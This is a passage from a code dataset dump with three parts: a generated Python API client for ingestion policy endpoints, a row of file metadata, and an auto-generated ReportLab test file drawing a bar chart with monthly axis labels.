body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/ingestionpolicy/{id}/addGroups', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerIngestionPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_ingestion_policy(self, **kwargs): # noqa: E501
"""Create a specific ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_ingestion_policy(async_req=True)
>>> result = thread.get()
:param async_req bool
:param IngestionPolicy body: Example Body: <pre>{ \"name\": \"Ingestion policy name\", \"description\": \"Ingestion policy description\" \"scope\": \"GROUP\", \"isLimited\": \"true\", \"limitPPS\": \"1000\" }</pre>
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_ingestion_policy_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.create_ingestion_policy_with_http_info(**kwargs) # noqa: E501
return data
def create_ingestion_policy_with_http_info(self, **kwargs): # noqa: E501
"""Create a specific ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_ingestion_policy_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param IngestionPolicy body: Example Body: <pre>{ \"name\": \"Ingestion policy name\", \"description\": \"Ingestion policy description\" \"scope\": \"GROUP\", \"isLimited\": \"true\", \"limitPPS\": \"1000\" }</pre>
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_ingestion_policy" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/ingestionpolicy', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerIngestionPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_ingestion_policy(self, id, **kwargs): # noqa: E501
"""Delete a specific ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_ingestion_policy(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_ingestion_policy_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_ingestion_policy_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_ingestion_policy_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete a specific ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_ingestion_policy_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_ingestion_policy" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `delete_ingestion_policy`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/ingestionpolicy/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerIngestionPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def export_csv(self, start_time, **kwargs): # noqa: E501
"""Export a CSV report # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.export_csv(start_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int start_time: start time in epoch seconds (required)
:param int end_time: end time in epoch seconds, null to use now
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.export_csv_with_http_info(start_time, **kwargs) # noqa: E501
else:
(data) = self.export_csv_with_http_info(start_time, **kwargs) # noqa: E501
return data
def export_csv_with_http_info(self, start_time, **kwargs): # noqa: E501
"""Export a CSV report # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.export_csv_with_http_info(start_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int start_time: start time in epoch seconds (required)
:param int end_time: end time in epoch seconds, null to use now
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_time', 'end_time'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method export_csv" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'start_time' is set
if self.api_client.client_side_validation and ('start_time' not in params or
params['start_time'] is None): # noqa: E501
raise ValueError("Missing the required parameter `start_time` when calling `export_csv`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'start_time' in params:
query_params.append(('startTime', params['start_time'])) # noqa: E501
if 'end_time' in params:
query_params.append(('endTime', params['end_time'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/csv']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/exportcsv', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_ingestion_policies(self, **kwargs): # noqa: E501
"""Get all ingestion policies for a customer # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_ingestion_policies(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_ingestion_policies_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_all_ingestion_policies_with_http_info(**kwargs) # noqa: E501
return data
def get_all_ingestion_policies_with_http_info(self, **kwargs): # noqa: E501
"""Get all ingestion policies for a customer # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_ingestion_policies_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_ingestion_policies" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/ingestionpolicy', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerPagedIngestionPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_ingestion_policy(self, id, **kwargs): # noqa: E501
"""Get a specific ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ingestion_policy(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_ingestion_policy_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_ingestion_policy_with_http_info(id, **kwargs) # noqa: E501
return data
def get_ingestion_policy_with_http_info(self, id, **kwargs): # noqa: E501
"""Get a specific ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_ingestion_policy_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_ingestion_policy" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `get_ingestion_policy`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/ingestionpolicy/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerIngestionPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_accounts(self, id, **kwargs): # noqa: E501
"""Remove accounts from ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_accounts(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: List of accounts to be added to ingestion policy
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.remove_accounts_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.remove_accounts_with_http_info(id, **kwargs) # noqa: E501
return data
def remove_accounts_with_http_info(self, id, **kwargs): # noqa: E501
"""Remove accounts from ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_accounts_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: List of accounts to be added to ingestion policy
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_accounts" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `remove_accounts`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/ingestionpolicy/{id}/removeAccounts', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerIngestionPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_groups(self, id, **kwargs): # noqa: E501
"""Remove groups from the ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_groups(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: List of groups to be removed from the ingestion policy
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.remove_groups_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.remove_groups_with_http_info(id, **kwargs) # noqa: E501
return data
def remove_groups_with_http_info(self, id, **kwargs): # noqa: E501
"""Remove groups from the ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_groups_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: List of groups to be removed from the ingestion policy
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_groups" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `remove_groups`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/ingestionpolicy/{id}/removeGroups', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerIngestionPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_ingestion_policy(self, id, **kwargs): # noqa: E501
"""Update a specific ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_ingestion_policy(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param IngestionPolicy body: Example Body: <pre>{ \"name\": \"Ingestion policy name\", \"description\": \"Ingestion policy description\" \"scope\": \"GROUP\", \"isLimited\": \"true\", \"limitPPS\": \"1000\" }</pre>
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_ingestion_policy_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.update_ingestion_policy_with_http_info(id, **kwargs) # noqa: E501
return data
def update_ingestion_policy_with_http_info(self, id, **kwargs): # noqa: E501
"""Update a specific ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_ingestion_policy_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param IngestionPolicy body: Example Body: <pre>{ \"name\": \"Ingestion policy name\", \"description\": \"Ingestion policy description\" \"scope\": \"GROUP\", \"isLimited\": \"true\", \"limitPPS\": \"1000\" }</pre>
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_ingestion_policy" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `update_ingestion_policy`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/ingestionpolicy/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerIngestionPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 39.492596
| 409
| 0.598835
| 4,492
| 40,006
| 5.097061
| 0.050089
| 0.05311
| 0.024458
| 0.031447
| 0.949904
| 0.944313
| 0.937849
| 0.928022
| 0.928022
| 0.922213
| 0
| 0.017655
| 0.307679
| 40,006
| 1,012
| 410
| 39.531621
| 0.809005
| 0.3359
| 0
| 0.809612
| 0
| 0
| 0.174532
| 0.061263
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038817
| false
| 0
| 0.007394
| 0
| 0.103512
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c4186249277a609345e8d458294613bb48d111e
| 9,403
|
py
|
Python
|
tests/charts-out/test_graphics_charts_barcharts_sampleV1.py
|
debragail/reportlab-mirror
|
1e5814e1313ed50d5abb65487b207711cb4f7595
|
[
"BSD-3-Clause"
] | 1
|
2020-05-21T23:34:55.000Z
|
2020-05-21T23:34:55.000Z
|
tests/charts-out/test_graphics_charts_barcharts_sampleV1.py
|
debragail/reportlab-mirror
|
1e5814e1313ed50d5abb65487b207711cb4f7595
|
[
"BSD-3-Clause"
] | null | null | null |
tests/charts-out/test_graphics_charts_barcharts_sampleV1.py
|
debragail/reportlab-mirror
|
1e5814e1313ed50d5abb65487b207711cb4f7595
|
[
"BSD-3-Clause"
] | null | null | null |
#Autogenerated by ReportLab guiedit do not edit
from reportlab.graphics.shapes import _DrawingEditorMixin, Drawing, Group, Rect, Line, String
from reportlab.lib.colors import Color, CMYKColor, PCMYKColor
class ExplodedDrawing_Drawing(_DrawingEditorMixin,Drawing):
def __init__(self,width=400,height=200,*args,**kw):
Drawing.__init__(self,width,height,*args,**kw)
self.transform = (1,0,0,1,0,0)
self.add(Rect(50,50,300,125,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(53.75,50,15,27.08333,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(91.25,50,15,10.41667,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(128.75,50,15,41.66667,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(166.25,50,15,45.83333,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(203.75,50,15,77.08333,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(241.25,50,15,93.75,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(278.75,50,15,39.58333,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(316.25,50,15,8.333333,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(68.75,50,15,29.16667,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(106.25,50,15,12.5,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(143.75,50,15,43.75,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(181.25,50,15,47.91667,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(218.75,50,15,79.16667,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(256.25,50,15,95.83333,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(293.75,50,15,41.66667,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Rect(331.25,50,15,10.41667,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,49,350,49,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,49,50,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(87.5,49,87.5,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(125,49,125,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(162.5,49,162.5,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(200,49,200,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(237.5,49,237.5,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(275,49,275,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(312.5,49,312.5,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(350,49,350,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.866025,.5,-0.5,.866025,76.75,47)
v0.add(String(-26.66,-10,'Jan-99',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (.866025,.5,-0.5,.866025,114.25,47)
v0.add(String(-28.33,-10,'Feb-99',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (.866025,.5,-0.5,.866025,151.75,47)
v0.add(String(-29.99,-10,'Mar-99',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (.866025,.5,-0.5,.866025,189.25,47)
v0.add(String(-28.88,-10,'Apr-99',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (.866025,.5,-0.5,.866025,226.75,47)
v0.add(String(-31.66,-10,'May-99',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (.866025,.5,-0.5,.866025,264.25,47)
v0.add(String(-27.22,-10,'Jun-99',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
